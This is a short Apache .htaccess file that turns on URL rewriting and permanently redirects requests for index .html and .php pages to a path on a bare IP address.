Options +FollowSymLinks

RewriteEngine on

RewriteBase /
RewriteCond %{REQUEST_URI} index(.*)\.html
RewriteRule ^(.*)$ http://18.188.212.80/mokumoku/ [R=301,L]
RewriteCond %{REQUEST_URI} index(.*)\.php
RewriteRule ^(.*)$ http://18.188.212.80/mokumoku/ [R=301,L]
